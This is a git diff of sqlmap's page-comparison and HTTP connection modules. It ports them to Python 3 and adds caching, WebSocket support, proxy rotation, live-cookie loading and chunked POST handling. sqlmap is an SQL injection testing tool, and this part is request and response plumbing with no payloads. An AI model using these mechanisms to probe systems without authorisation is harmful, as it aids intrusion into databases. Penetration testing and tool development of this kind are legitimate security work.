getFilteredPageContent from lib.core.common import listToStrValue from lib.core.common import removeDynamicContent -from lib.core.common import wasLastRequestDBMSError -from lib.core.common import wasLastRequestHTTPError +from lib.core.common import getLastRequestHTTPError +from lib.core.common import wasLastResponseDBMSError +from lib.core.common import wasLastResponseHTTPError +from lib.core.convert import getBytes from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger @@ -20,14 +24,25 @@ from lib.core.settings import DEFAULT_PAGE_ENCODING from lib.core.settings import DIFF_TOLERANCE from lib.core.settings import HTML_TITLE_REGEX -from lib.core.settings import MIN_RATIO +from lib.core.settings import LOWER_RATIO_BOUND +from lib.core.settings import MAX_DIFFLIB_SEQUENCE_LENGTH from lib.core.settings import MAX_RATIO +from lib.core.settings import MIN_RATIO from lib.core.settings import REFLECTED_VALUE_MARKER -from lib.core.settings import LOWER_RATIO_BOUND from lib.core.settings import UPPER_RATIO_BOUND +from lib.core.settings import URI_HTTP_HEADER from lib.core.threads import getCurrentThreadData +from thirdparty import six def comparison(page, headers, code=None, getRatioValue=False, pageLength=None): + if not isinstance(page, (six.text_type, six.binary_type, type(None))): + logger.critical("got page of type %s; repr(page)[:200]=%s" % (type(page), repr(page)[:200])) + + try: + page = b"".join(page) + except: + page = six.text_type(page) + _ = _adjust(_comparison(page, headers, code, getRatioValue, pageLength), getRatioValue) return _ @@ -47,25 +62,29 @@ def _comparison(page, headers, code, getRatioValue, pageLength): threadData = getCurrentThreadData() if kb.testMode: - threadData.lastComparisonHeaders = listToStrValue(headers.headers) if headers else "" + threadData.lastComparisonHeaders = listToStrValue(_ for _ in headers.headers if not _.startswith("%s:" % URI_HTTP_HEADER)) if headers else "" threadData.lastComparisonPage = page + threadData.lastComparisonCode = code if page is None and pageLength is None: return None - seqMatcher = threadData.seqMatcher - seqMatcher.set_seq1(kb.pageTemplate) - if any((conf.string, conf.notString, conf.regexp)): - rawResponse = "%s%s" % (listToStrValue(headers.headers) if headers else "", page) + rawResponse = "%s%s" % (listToStrValue(_ for _ in headers.headers if not _.startswith("%s:" % URI_HTTP_HEADER)) if headers else "", page) - # String to match in page when the query is True and/or valid + # String to match in page when the query is True if conf.string: return conf.string in rawResponse - # String to match in page when the query is False and/or invalid + # String to match in page when the query is False if conf.notString: - return conf.notString not in rawResponse + if conf.notString in rawResponse: + return False + else: + if kb.errorIsNone and (wasLastResponseDBMSError() or wasLastResponseHTTPError()): + return None + else: + return True # Regular expression to match in page when the query is True and/or valid if conf.regexp: @@ -75,22 +94,30 @@ def _comparison(page, headers, code, getRatioValue, pageLength): if conf.code: return conf.code == code + seqMatcher = threadData.seqMatcher + seqMatcher.set_seq1(kb.pageTemplate) + if page: # In case of an DBMS error page return None - if kb.errorIsNone and (wasLastRequestDBMSError() or wasLastRequestHTTPError()): - return None + if kb.errorIsNone and (wasLastResponseDBMSError() or wasLastResponseHTTPError()) and not kb.negativeLogic: + if not (wasLastResponseHTTPError() and getLastRequestHTTPError() in (conf.ignoreCode or [])): + return None # Dynamic content lines to be excluded before comparison if not kb.nullConnection: page = removeDynamicContent(page) - seqMatcher.set_seq1(removeDynamicContent(kb.pageTemplate)) + if threadData.lastPageTemplate != kb.pageTemplate: + threadData.lastPageTemplateCleaned = removeDynamicContent(kb.pageTemplate) + threadData.lastPageTemplate = kb.pageTemplate + + seqMatcher.set_seq1(threadData.lastPageTemplateCleaned) if not pageLength: pageLength = len(page) if kb.nullConnection and pageLength: if not seqMatcher.a: - errMsg = "problem occured while retrieving original page content " + errMsg = "problem occurred while retrieving original page content " errMsg += "which prevents sqlmap from continuation. Please rerun, " errMsg += "and if the problem persists turn off any optimization switches" raise SqlmapNoneDataException(errMsg) @@ -102,40 +129,68 @@ def _comparison(page, headers, code, getRatioValue, pageLength): else: # Preventing "Unicode equal comparison failed to convert both arguments to Unicode" # (e.g. if one page is PDF and the other is HTML) - if isinstance(seqMatcher.a, str) and isinstance(page, unicode): - page = page.encode(kb.pageEncoding or DEFAULT_PAGE_ENCODING, 'ignore') - elif isinstance(seqMatcher.a, unicode) and isinstance(page, str): - seqMatcher.a = seqMatcher.a.encode(kb.pageEncoding or DEFAULT_PAGE_ENCODING, 'ignore') - - seq1, seq2 = None, None + if isinstance(seqMatcher.a, six.binary_type) and isinstance(page, six.text_type): + page = getBytes(page, kb.pageEncoding or DEFAULT_PAGE_ENCODING, "ignore") + elif isinstance(seqMatcher.a, six.text_type) and isinstance(page, six.binary_type): + seqMatcher.set_seq1(getBytes(seqMatcher.a, kb.pageEncoding or DEFAULT_PAGE_ENCODING, "ignore")) - if conf.titles: - seq1 = extractRegexResult(HTML_TITLE_REGEX, seqMatcher.a) - seq2 = extractRegexResult(HTML_TITLE_REGEX, page) + if any(_ is None for _ in (page, seqMatcher.a)): + return None + elif seqMatcher.a and page and seqMatcher.a == page: + ratio = 1. + elif kb.skipSeqMatcher or seqMatcher.a and page and any(len(_) > MAX_DIFFLIB_SEQUENCE_LENGTH for _ in (seqMatcher.a, page)): + if not page or not seqMatcher.a: + return float(seqMatcher.a == page) + else: + ratio = 1. * len(seqMatcher.a) / len(page) + if ratio > 1: + ratio = 1. / ratio else: - seq1 = getFilteredPageContent(seqMatcher.a, True) if conf.textOnly else seqMatcher.a - seq2 = getFilteredPageContent(page, True) if conf.textOnly else page + seq1, seq2 = None, None - if seq1 is None or seq2 is None: - return None + if conf.titles: + seq1 = extractRegexResult(HTML_TITLE_REGEX, seqMatcher.a) + seq2 = extractRegexResult(HTML_TITLE_REGEX, page) + else: + seq1 = getFilteredPageContent(seqMatcher.a, True) if conf.textOnly else seqMatcher.a + seq2 = getFilteredPageContent(page, True) if conf.textOnly else page + + if seq1 is None or seq2 is None: + return None + + if isinstance(seq1, six.binary_type): + seq1 = seq1.replace(REFLECTED_VALUE_MARKER.encode(), b"") + elif isinstance(seq1, six.text_type): + seq1 = seq1.replace(REFLECTED_VALUE_MARKER, "") - seq1 = seq1.replace(REFLECTED_VALUE_MARKER, "") - seq2 = seq2.replace(REFLECTED_VALUE_MARKER, "") + if isinstance(seq2, six.binary_type): + seq2 = seq2.replace(REFLECTED_VALUE_MARKER.encode(), b"") + elif isinstance(seq2, six.text_type): + seq2 = seq2.replace(REFLECTED_VALUE_MARKER, "") - count = 0 - while count < min(len(seq1), len(seq2)): - if seq1[count] == seq2[count]: - count += 1 + if kb.heavilyDynamic: + seq1 = seq1.split("\n" if isinstance(seq1, six.text_type) else b"\n") + seq2 = seq2.split("\n" if isinstance(seq2, six.text_type) else b"\n") + + key = None + else: + key = (hash(seq1), hash(seq2)) + + seqMatcher.set_seq1(seq1) + seqMatcher.set_seq2(seq2) + + if key in kb.cache.comparison: + ratio = kb.cache.comparison[key] else: - break - if count: - seq1 = seq1[count:] - seq2 = seq2[count:] + try: + ratio = seqMatcher.quick_ratio() if not kb.heavilyDynamic else seqMatcher.ratio() + except (TypeError, MemoryError): + ratio = seqMatcher.ratio() - seqMatcher.set_seq1(seq1) - seqMatcher.set_seq2(seq2) + ratio = round(ratio, 3) - ratio = round(seqMatcher.quick_ratio(), 3) + if key: + kb.cache.comparison[key] = ratio # If the url is stable and we did not set yet the match ratio and the # current injected value changes the url page content @@ -144,6 +199,9 @@ def _comparison(page, headers, code, getRatioValue, pageLength): kb.matchRatio = ratio logger.debug("setting match ratio for current parameter to %.3f" % kb.matchRatio) + if kb.testMode: + threadData.lastComparisonRatio = ratio + # If it has been requested to return the ratio and not a comparison # response if getRatioValue: @@ -152,6 +210,9 @@ def _comparison(page, headers, code, getRatioValue, pageLength): elif ratio > UPPER_RATIO_BOUND: return True + elif ratio < LOWER_RATIO_BOUND: + return False + elif kb.matchRatio is None: return None diff --git a/lib/request/connect.py b/lib/request/connect.py index e2ea2ac3efa..ad22bf9575c 100644 --- a/lib/request/connect.py +++ b/lib/request/connect.py @@ -1,88 +1,151 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ -import httplib -import json +import binascii +import inspect +import logging +import os +import random import re import socket import string +import struct +import sys import time -import urllib2 -import urlparse import traceback -from extra.safe2bin.safe2bin import safecharencode +try: + import websocket + from websocket import WebSocketException +except ImportError: + class WebSocketException(Exception): + pass + from lib.core.agent import agent from lib.core.common import asciifyUrl from lib.core.common import calculateDeltaSeconds +from lib.core.common import checkFile +from lib.core.common import checkSameHost +from lib.core.common import chunkSplitPostData from lib.core.common import clearConsoleLine -from lib.core.common import cpuThrottle +from lib.core.common import dataToStdout +from lib.core.common import escapeJsonValue from lib.core.common import evaluateCode from lib.core.common import extractRegexResult +from lib.core.common import filterNone from lib.core.common import findMultipartPostBoundary from lib.core.common import getCurrentThreadData +from lib.core.common import getHeader from lib.core.common import getHostHeader from lib.core.common import getRequestHeader -from lib.core.common import getUnicode +from lib.core.common import getSafeExString from lib.core.common import logHTTPTraffic +from lib.core.common import openFile +from lib.core.common import popValue +from lib.core.common import parseJson +from lib.core.common import pushValue from lib.core.common import randomizeParameterValue +from lib.core.common import randomInt +from lib.core.common import randomStr from lib.core.common import readInput from lib.core.common import removeReflectiveValues +from lib.core.common import safeVariableNaming +from lib.core.common import singleTimeLogMessage from lib.core.common import singleTimeWarnMessage from lib.core.common import stdev -from lib.core.common import wasLastRequestDelayed -from lib.core.common import unicodeencode +from lib.core.common import unArrayizeValue +from lib.core.common import unsafeVariableNaming +from lib.core.common import urldecode from lib.core.common import urlencode +from lib.core.common import wasLastResponseDelayed +from lib.core.compat import LooseVersion +from lib.core.compat import patchHeaders +from lib.core.compat import xrange +from lib.core.convert import encodeBase64 +from lib.core.convert import getBytes +from lib.core.convert import getText +from lib.core.convert import getUnicode +from lib.core.data import cmdLineOptions from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger +from lib.core.datatype import AttribDict +from lib.core.decorators import stackedmethod from lib.core.dicts import POST_HINT_CONTENT_TYPES from lib.core.enums import ADJUST_TIME_DELAY +from lib.core.enums import AUTH_TYPE from lib.core.enums import CUSTOM_LOGGING -from lib.core.enums import HTTPHEADER +from lib.core.enums import HINT +from lib.core.enums import HTTP_HEADER from lib.core.enums import HTTPMETHOD from lib.core.enums import NULLCONNECTION from lib.core.enums import PAYLOAD from lib.core.enums import PLACE from lib.core.enums import POST_HINT from lib.core.enums import REDIRECTION -from lib.core.enums import WEB_API +from lib.core.enums import WEB_PLATFORM from lib.core.exception import SqlmapCompressionException from lib.core.exception import SqlmapConnectionException +from lib.core.exception import SqlmapGenericException +from lib.core.exception import SqlmapMissingDependence +from lib.core.exception import SqlmapSkipTargetException from lib.core.exception import SqlmapSyntaxException +from lib.core.exception import SqlmapTokenException from lib.core.exception import SqlmapValueException -from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR +from lib.core.settings import ASTERISK_MARKER +from lib.core.settings import BOUNDARY_BACKSLASH_MARKER from lib.core.settings import DEFAULT_CONTENT_TYPE +from lib.core.settings import DEFAULT_COOKIE_DELIMITER from lib.core.settings import DEFAULT_GET_POST_DELIMITER -from lib.core.settings import HTTP_ACCEPT_HEADER_VALUE +from lib.core.settings import DEFAULT_USER_AGENT +from lib.core.settings import EVALCODE_ENCODED_PREFIX from lib.core.settings import HTTP_ACCEPT_ENCODING_HEADER_VALUE -from lib.core.settings import HTTP_SILENT_TIMEOUT -from lib.core.settings import MAX_CONNECTION_CHUNK_SIZE +from lib.core.settings import HTTP_ACCEPT_HEADER_VALUE +from lib.core.settings import IPS_WAF_CHECK_PAYLOAD +from lib.core.settings import IS_WIN +from lib.core.settings import JAVASCRIPT_HREF_REGEX +from lib.core.settings import LARGE_READ_TRIM_MARKER +from lib.core.settings import LIVE_COOKIES_TIMEOUT +from lib.core.settings import MIN_HTTPX_VERSION +from lib.core.settings import MAX_CONNECTION_READ_SIZE from lib.core.settings import MAX_CONNECTIONS_REGEX from lib.core.settings import MAX_CONNECTION_TOTAL_SIZE +from lib.core.settings import MAX_CONSECUTIVE_CONNECTION_ERRORS +from lib.core.settings import MAX_MURPHY_SLEEP_TIME from lib.core.settings import META_REFRESH_REGEX +from lib.core.settings import MAX_TIME_RESPONSES from lib.core.settings import MIN_TIME_RESPONSES -from lib.core.settings import IS_WIN -from lib.core.settings import LARGE_CHUNK_TRIM_MARKER from lib.core.settings import PAYLOAD_DELIMITER from lib.core.settings import PERMISSION_DENIED_REGEX +from lib.core.settings import PLAIN_TEXT_CONTENT_TYPE +from lib.core.settings import RANDOM_INTEGER_MARKER +from lib.core.settings import RANDOM_STRING_MARKER +from lib.core.settings import REPLACEMENT_MARKER +from lib.core.settings import SAFE_HEX_MARKER +from lib.core.settings import TEXT_CONTENT_TYPE_REGEX from lib.core.settings import UNENCODED_ORIGINAL_VALUE +from lib.core.settings import UNICODE_ENCODING from lib.core.settings import URI_HTTP_HEADER from lib.core.settings import WARN_TIME_STDEV +from lib.core.settings import WEBSOCKET_INITIAL_TIMEOUT +from lib.core.settings import YUGE_FACTOR from lib.request.basic import decodePage from lib.request.basic import forgeHeaders from lib.request.basic import processResponse -from lib.request.direct import direct from lib.request.comparison import comparison +from lib.request.direct import direct from lib.request.methodrequest import MethodRequest -from lib.utils.checkpayload import checkPayload +from lib.utils.safe2bin import safecharencode +from thirdparty import six +from thirdparty.odict import OrderedDict +from thirdparty.six import unichr as _unichr +from thirdparty.six.moves import http_client as _http_client +from thirdparty.six.moves import urllib as _urllib from thirdparty.socks.socks import ProxyError -from thirdparty.multipart import multipartpost - class Connect(object): """ @@ -91,23 +154,43 @@ class Connect(object): @staticmethod def _getPageProxy(**kwargs): - return Connect.getPage(**kwargs) + try: + if (len(inspect.stack()) > sys.getrecursionlimit() // 2): # Note: https://github.com/sqlmapproject/sqlmap/issues/4525 + warnMsg = "unable to connect to the target URL" + raise SqlmapConnectionException(warnMsg) + except (TypeError, UnicodeError): + pass + + try: + return Connect.getPage(**kwargs) + except RuntimeError: + return None, None, None @staticmethod def _retryProxy(**kwargs): threadData = getCurrentThreadData() threadData.retriesCount += 1 + if conf.proxyList and threadData.retriesCount >= conf.retries and not kb.locks.handlers.locked(): + warnMsg = "changing proxy" + logger.warning(warnMsg) + + conf.proxy = None + threadData.retriesCount = 0 + + setHTTPHandlers() + if kb.testMode and kb.previousMethod == PAYLOAD.METHOD.TIME: # timed based payloads can cause web server unresponsiveness # if the injectable piece of code is some kind of JOIN-like query - warnMsg = "most probably web server instance hasn't recovered yet " + warnMsg = "most likely web server instance hasn't recovered yet " warnMsg += "from previous timed based payload. If the problem " - warnMsg += "persists please wait for few minutes and rerun " - warnMsg += "without flag T in option '--technique' " + warnMsg += "persists please wait for a few minutes and rerun " + warnMsg += "without flag 'T' in option '--technique' " warnMsg += "(e.g. '--flush-session --technique=BEUS') or try to " warnMsg += "lower the value of option '--time-sec' (e.g. '--time-sec=2')" singleTimeWarnMessage(warnMsg) + elif kb.originalPage is None: if conf.tor: warnMsg = "please make sure that you have " @@ -115,48 +198,63 @@ def _retryProxy(**kwargs): warnMsg += "you could successfully use " warnMsg += "switch '--tor' " if IS_WIN: - warnMsg += "(e.g. 'https://www.torproject.org/download/download.html.en')" + warnMsg += "(e.g. 'https://www.torproject.org/download/')" else: warnMsg += "(e.g. 'https://help.ubuntu.com/community/Tor')" else: warnMsg = "if the problem persists please check that the provided " - warnMsg += "target url is valid. In case that it is, you can try to rerun " - warnMsg += "with the switch '--random-agent' turned on " - warnMsg += "and/or proxy switches ('--ignore-proxy', '--proxy',...)" + warnMsg += "target URL is reachable" + + items = [] + if not conf.randomAgent: + items.append("switch '--random-agent'") + if not any((conf.proxy, conf.proxyFile, conf.tor)): + items.append("proxy switches ('--proxy', '--proxy-file'...)") + if items: + warnMsg += ". In case that it is, " + warnMsg += "you can try to rerun with " + warnMsg += " and/or ".join(items) + singleTimeWarnMessage(warnMsg) + elif conf.threads > 1: warnMsg = "if the problem persists please try to lower " warnMsg += "the number of used threads (option '--threads')" singleTimeWarnMessage(warnMsg) - time.sleep(1) - kwargs['retrying'] = True return Connect._getPageProxy(**kwargs) @staticmethod def _connReadProxy(conn): - retVal = "" + retVal = b"" if not kb.dnsMode and conn: headers = conn.info() - if headers and (headers.getheader(HTTPHEADER.CONTENT_ENCODING, "").lower() in ("gzip", "deflate")\ - or "text" not in headers.getheader(HTTPHEADER.CONTENT_TYPE, "").lower()): + if kb.pageCompress and headers and hasattr(headers, "getheader") and (headers.getheader(HTTP_HEADER.CONTENT_ENCODING, "").lower() in ("gzip", "deflate") or "text" not in headers.getheader(HTTP_HEADER.CONTENT_TYPE, "").lower()): retVal = conn.read(MAX_CONNECTION_TOTAL_SIZE) if len(retVal) == MAX_CONNECTION_TOTAL_SIZE: warnMsg = "large compressed response detected. Disabling compression" singleTimeWarnMessage(warnMsg) kb.pageCompress = False + raise SqlmapCompressionException else: while True: - _ = conn.read(MAX_CONNECTION_CHUNK_SIZE) - if len(_) == MAX_CONNECTION_CHUNK_SIZE: + if not conn: + break + else: + try: + part = conn.read(MAX_CONNECTION_READ_SIZE) + except AssertionError: + part = b"" + + if len(part) == MAX_CONNECTION_READ_SIZE: warnMsg = "large response detected. This could take a while" singleTimeWarnMessage(warnMsg) - _ = re.sub(r"(?si)%s.+?%s" % (kb.chars.stop, kb.chars.start), "%s%s%s" % (kb.chars.stop, LARGE_CHUNK_TRIM_MARKER, kb.chars.start), _) - retVal += _ + part = re.sub(getBytes(r"(?si)%s.+?%s" % (kb.chars.stop, kb.chars.start)), getBytes("%s%s%s" % (kb.chars.stop, LARGE_READ_TRIM_MARKER, kb.chars.start)), part) + retVal += part else: - retVal += _ + retVal += part break if len(retVal) > MAX_CONNECTION_TOTAL_SIZE: @@ -164,49 +262,115 @@ def _connReadProxy(conn): singleTimeWarnMessage(warnMsg) break + if conf.yuge: + retVal = YUGE_FACTOR * retVal + return retVal @staticmethod def getPage(**kwargs): """ - This method connects to the target url or proxy and returns - the target url page content + This method connects to the target URL or proxy and returns + the target URL page content """ - if conf.delay is not None and isinstance(conf.delay, (int, float)) and conf.delay > 0: + if conf.offline: + return None, None, None + + url = kwargs.get("url", None) or conf.url + get = kwargs.get("get", None) + post = kwargs.get("post", None) + method = kwargs.get("method", None) + cookie = kwargs.get("cookie", None) + ua = kwargs.get("ua", None) or conf.agent + referer = kwargs.get("referer", None) or conf.referer + direct_ = kwargs.get("direct", False) + multipart = kwargs.get("multipart", None) + silent = kwargs.get("silent", False) + raise404 = kwargs.get("raise404", True) + timeout = kwargs.get("timeout", None) or conf.timeout + auxHeaders = kwargs.get("auxHeaders", None) + response = kwargs.get("response", False) + ignoreTimeout = kwargs.get("ignoreTimeout", False) or kb.ignoreTimeout or conf.ignoreTimeouts + refreshing = kwargs.get("refreshing", False) + retrying = kwargs.get("retrying", False) + crawling = kwargs.get("crawling", False) + checking = kwargs.get("checking", False) + skipRead = kwargs.get("skipRead", False) + finalCode = kwargs.get("finalCode", False) + chunked = kwargs.get("chunked", False) or conf.chunked + + if isinstance(conf.delay, (int, float)) and conf.delay > 0: time.sleep(conf.delay) - elif conf.cpuThrottle: - cpuThrottle(conf.cpuThrottle) + + start = time.time() threadData = getCurrentThreadData() with kb.locks.request: kb.requestCounter += 1 threadData.lastRequestUID = kb.requestCounter - url = kwargs.get('url', conf.url) - get = kwargs.get('get', None) - post = kwargs.get('post', None) - method = kwargs.get('method', None) - cookie = kwargs.get('cookie', None) - ua = kwargs.get('ua', None) - referer = kwargs.get('referer', None) - host = kwargs.get('host', conf.host) - direct_ = kwargs.get('direct', False) - multipart = kwargs.get('multipart', False) - silent = kwargs.get('silent', False) - raise404 = kwargs.get('raise404', True) - auxHeaders = kwargs.get('auxHeaders', None) - response = kwargs.get('response', False) - ignoreTimeout = kwargs.get('ignoreTimeout', kb.ignoreTimeout) - refreshing = kwargs.get('refreshing', False) - retrying = kwargs.get('retrying', False) - crawling = kwargs.get('crawling', False) - - if not urlparse.urlsplit(url).netloc: - url = urlparse.urljoin(conf.url, url) + if conf.proxyFreq: + if kb.requestCounter % conf.proxyFreq == 0: + conf.proxy = None + + warnMsg = "changing proxy" + logger.warning(warnMsg) + + setHTTPHandlers() + + if conf.dummy or conf.murphyRate and randomInt() % conf.murphyRate == 0: + if conf.murphyRate: + time.sleep(randomInt() % (MAX_MURPHY_SLEEP_TIME + 1)) + + page, headers, code = randomStr(int(randomInt()), alphabet=[_unichr(_) for _ in xrange(256)]), None, None if not conf.murphyRate else randomInt(3) + + threadData.lastPage = page + threadData.lastCode = code + + return page, headers, code + + if conf.liveCookies: + with kb.locks.liveCookies: + if not checkFile(conf.liveCookies, raiseOnError=False) or os.path.getsize(conf.liveCookies) == 0: + warnMsg = "[%s] [WARNING] live cookies file '%s' is empty or non-existent. Waiting for timeout (%d seconds)" % (time.strftime("%X"), conf.liveCookies, LIVE_COOKIES_TIMEOUT) + dataToStdout(warnMsg) + + valid = False + for _ in xrange(LIVE_COOKIES_TIMEOUT): + if checkFile(conf.liveCookies, raiseOnError=False) and os.path.getsize(conf.liveCookies) > 0: + valid = True + break + else: + dataToStdout('.') + time.sleep(1) + + dataToStdout("\n") + + if not valid: + errMsg = "problem occurred while loading cookies from file '%s'" % conf.liveCookies + raise SqlmapValueException(errMsg) + + cookie = openFile(conf.liveCookies).read().strip() + cookie = re.sub(r"(?i)\ACookie:\s*", "", cookie) + + if multipart: + post = multipart + else: + if not post: + chunked = False + + elif chunked: + post = _urllib.parse.unquote(post) + post = chunkSplitPostData(post) + + webSocket = url.lower().startswith("ws") + + if not _urllib.parse.urlsplit(url).netloc: + url = _urllib.parse.urljoin(conf.url, url) # flag to know if we are dealing with the same target host - target = reduce(lambda x, y: x == y, map(lambda x: urlparse.urlparse(x).netloc.split(':')[0], [url, conf.url or ""])) + target = checkSameHost(url, conf.url) if not retrying: # Reset the number of connection retries @@ -216,12 +380,17 @@ def getPage(**kwargs): # url splitted with space char while urlencoding it in the later phase url = url.replace(" ", "%20") - code = None + if "://" not in url: + url = "http://%s" % url + + conn = None page = None + code = None + status = None - _ = urlparse.urlsplit(url) - requestMsg = u"HTTP request [#%d]:\n%s " % (threadData.lastRequestUID, method or (HTTPMETHOD.POST if post is not None else HTTPMETHOD.GET)) - requestMsg += ("%s%s" % (_.path or "/", ("?%s" % _.query) if _.query else "")) if not any((refreshing, crawling)) else url + _ = _urllib.parse.urlsplit(url) + requestMsg = u"HTTP request [#%d]:\r\n%s " % (threadData.lastRequestUID, method or (HTTPMETHOD.POST if post is not None else HTTPMETHOD.GET)) + requestMsg += getUnicode(("%s%s" % (_.path or "/", ("?%s" % _.query) if _.query else "")) if not any((refreshing, crawling, checking)) else url) responseMsg = u"HTTP response " requestHeaders = u"" responseHeaders = None @@ -234,335 +403,634 @@ def getPage(**kwargs): # support those by default url = asciifyUrl(url) - # fix for known issues when using url in unicode format - # (e.g. UnicodeDecodeError: "url = url + '?' + query" in redirect case) - url = unicodeencode(url) - try: - if silent: - socket.setdefaulttimeout(HTTP_SILENT_TIMEOUT) - else: - socket.setdefaulttimeout(conf.timeout) + socket.setdefaulttimeout(timeout) if direct_: - if "?" in url: - url, params = url.split("?") + if '?' in url: + url, params = url.split('?', 1) params = urlencode(params) url = "%s?%s" % (url, params) - requestMsg += "?%s" % params - - elif multipart: - # Needed in this form because of potential circle dependency - # problem (option -> update -> connect -> option) - from lib.core.option import proxyHandler - - multipartOpener = urllib2.build_opener(proxyHandler, multipartpost.MultipartPostHandler) - conn = multipartOpener.open(unicodeencode(url), multipart) - page = Connect._connReadProxy(conn) - responseHeaders = conn.info() - responseHeaders[URI_HTTP_HEADER] = conn.geturl() - page = decodePage(page, responseHeaders.get(HTTPHEADER.CONTENT_ENCODING), responseHeaders.get(HTTPHEADER.CONTENT_TYPE)) - return page - - elif any((refreshing, crawling)): + elif any((refreshing, crawling, checking)): pass elif target: + if conf.forceSSL: + url = re.sub(r"(?i)\A(http|ws):", r"\g<1>s:", url) + url = re.sub(r"(?i):80/", ":443/", url) + if PLACE.GET in conf.parameters and not get: get = conf.parameters[PLACE.GET] + if not conf.skipUrlEncode: + get = urlencode(get, limit=True) + if get: - url = "%s?%s" % (url, get) - requestMsg += "?%s" % get + if '?' in url: + url = "%s%s%s" % (url, DEFAULT_GET_POST_DELIMITER, get) + requestMsg += "%s%s" % (DEFAULT_GET_POST_DELIMITER, get) + else: + url = "%s?%s" % (url, get) + requestMsg += "?%s" % get - if conf.method == HTTPMETHOD.POST and not post: - for place in (PLACE.POST,): - if place in conf.parameters: - post = conf.parameters[place] - break + if PLACE.POST in conf.parameters and not post and method != HTTPMETHOD.GET: + post = conf.parameters[PLACE.POST] elif get: url = "%s?%s" % (url, get) requestMsg += "?%s" % get - requestMsg += " %s" % httplib.HTTPConnection._http_vsn_str + requestMsg += " %s" % _http_client.HTTPConnection._http_vsn_str # Prepare HTTP headers - headers = forgeHeaders({HTTPHEADER.COOKIE: cookie, HTTPHEADER.USER_AGENT: ua, HTTPHEADER.REFERER: referer}) + headers = forgeHeaders({HTTP_HEADER.COOKIE: cookie, HTTP_HEADER.USER_AGENT: ua, HTTP_HEADER.REFERER: referer, HTTP_HEADER.HOST: getHeader(dict(conf.httpHeaders), HTTP_HEADER.HOST) or getHostHeader(url)}, base=None if target else {}) + + if HTTP_HEADER.COOKIE in headers: + cookie = headers[HTTP_HEADER.COOKIE] if kb.authHeader: - headers[HTTPHEADER.AUTHORIZATION] = kb.authHeader + headers[HTTP_HEADER.AUTHORIZATION] = kb.authHeader if kb.proxyAuthHeader: - headers[HTTPHEADER.PROXY_AUTHORIZATION] = kb.proxyAuthHeader + headers[HTTP_HEADER.PROXY_AUTHORIZATION] = kb.proxyAuthHeader + + if not conf.requestFile or not target: + if not getHeader(headers, HTTP_HEADER.ACCEPT): + headers[HTTP_HEADER.ACCEPT] = HTTP_ACCEPT_HEADER_VALUE - headers[HTTPHEADER.ACCEPT] = HTTP_ACCEPT_HEADER_VALUE - headers[HTTPHEADER.ACCEPT_ENCODING] = HTTP_ACCEPT_ENCODING_HEADER_VALUE if method != HTTPMETHOD.HEAD and kb.pageCompress else "identity" - headers[HTTPHEADER.HOST] = host or getHostHeader(url) + if not getHeader(headers, HTTP_HEADER.ACCEPT_ENCODING): + headers[HTTP_HEADER.ACCEPT_ENCODING] = HTTP_ACCEPT_ENCODING_HEADER_VALUE if kb.pageCompress else "identity" - if post is not None and HTTPHEADER.CONTENT_TYPE not in headers: - headers[HTTPHEADER.CONTENT_TYPE] = POST_HINT_CONTENT_TYPES.get(kb.postHint, DEFAULT_CONTENT_TYPE) + elif conf.requestFile and getHeader(headers, HTTP_HEADER.USER_AGENT) == DEFAULT_USER_AGENT: + for header in headers: + if header.upper() == HTTP_HEADER.USER_AGENT.upper(): + del headers[header] + break + + if post is not None and not multipart and not getHeader(headers, HTTP_HEADER.CONTENT_TYPE): + headers[HTTP_HEADER.CONTENT_TYPE] = POST_HINT_CONTENT_TYPES.get(kb.postHint, DEFAULT_CONTENT_TYPE if unArrayizeValue(conf.base64Parameter) != HTTPMETHOD.POST else PLAIN_TEXT_CONTENT_TYPE) - if headers.get(HTTPHEADER.CONTENT_TYPE) == POST_HINT_CONTENT_TYPES[POST_HINT.MULTIPART]: - warnMsg = "missing 'boundary parameter' in '%s' header. " % HTTPHEADER.CONTENT_TYPE + if headers.get(HTTP_HEADER.CONTENT_TYPE) == POST_HINT_CONTENT_TYPES[POST_HINT.MULTIPART]: + warnMsg = "missing 'boundary parameter' in '%s' header. " % HTTP_HEADER.CONTENT_TYPE warnMsg += "Will try to reconstruct" singleTimeWarnMessage(warnMsg) boundary = findMultipartPostBoundary(conf.data) if boundary: - headers[HTTPHEADER.CONTENT_TYPE] = "%s; boundary=%s" % (headers[HTTPHEADER.CONTENT_TYPE], boundary) + headers[HTTP_HEADER.CONTENT_TYPE] = "%s; boundary=%s" % (headers[HTTP_HEADER.CONTENT_TYPE], boundary) + + if conf.keepAlive: + headers[HTTP_HEADER.CONNECTION] = "keep-alive" + + if chunked: + headers[HTTP_HEADER.TRANSFER_ENCODING] = "chunked" if auxHeaders: - for key, item in auxHeaders.items(): - headers[key] = item + headers = forgeHeaders(auxHeaders, headers) + + if kb.headersFile: + content = openFile(kb.headersFile, 'r').read() + for line in content.split("\n"): + line = getText(line.strip()) + if ':' in line: + header, value = line.split(':', 1) + headers[header] = value + + if conf.localhost: + headers[HTTP_HEADER.HOST] = "localhost" + + for key, value in list(headers.items()): + if key.upper() == HTTP_HEADER.ACCEPT_ENCODING.upper(): + value = re.sub(r"(?i)(,)br(,)?", lambda match: ',' if match.group(1) and match.group(2) else "", value) or "identity" - for key, item in headers.items(): del headers[key] - headers[unicodeencode(key, kb.pageEncoding)] = unicodeencode(item, kb.pageEncoding) + if isinstance(value, six.string_types): + for char in (r"\r", r"\n"): + value = re.sub(r"(%s)([^ \t])" % char, r"\g<1>\t\g<2>", value) + headers[getBytes(key) if six.PY2 else key] = getBytes(value.strip("\r\n")) # Note: Python3 has_header() expects non-bytes value + + if six.PY2: + url = getBytes(url) # Note: Python3 requires text while Python2 has problems when mixing text with binary POST + + if webSocket: + ws = websocket.WebSocket() + ws.settimeout(WEBSOCKET_INITIAL_TIMEOUT if kb.webSocketRecvCount is None else timeout) + ws.connect(url, header=("%s: %s" % _ for _ in headers.items() if _[0] not in ("Host",)), cookie=cookie) # WebSocket will add Host field of headers automatically + ws.send(urldecode(post or "")) + + _page = [] + + if kb.webSocketRecvCount is None: + while True: + try: + _page.append(ws.recv()) + except websocket.WebSocketTimeoutException: + kb.webSocketRecvCount = len(_page) + break + else: + for i in xrange(max(1, kb.webSocketRecvCount)): + _page.append(ws.recv()) - post = unicodeencode(post, 